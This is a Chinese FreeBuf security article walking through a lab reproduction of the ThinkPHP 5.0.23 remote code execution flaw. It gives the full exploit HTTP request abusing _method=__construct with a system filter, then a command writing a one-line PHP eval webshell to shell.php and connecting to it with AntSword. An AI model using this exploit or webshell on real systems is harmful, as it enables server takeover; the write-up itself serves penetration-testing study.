freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一文实现Thinkphp5.0.23 rce复现过程
2023-11-03 09:05:26

一、成因

ThinkPHP是中国使用极其广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中,框架在获取请求方法时错误地对其进行处理,从而允许攻击者调用 Request 类的任何方法,从而通过特定漏洞链导致 RCE 漏洞。

二、漏洞利用

进入靶场页面

1698973196_6544460ccc06baeb91121.png!small

根据漏洞POC,远程代码执行命令为:id

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id #传入的参数

用burp抓包更改请求方式GET为POST

1698973299_654446730f8228d88264e.png!small

写入一句话木马

echo '<?php eval($_POST[cmd]); ?>' > shell.php

1698973400_654446d813b0dfee46d73.png!small

连接蚁剑

1698973415_654446e70390566671e57.png!small

1698973420_654446ecf1620ea73bf6f.png!small

# 漏洞 # 渗透测试 # web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者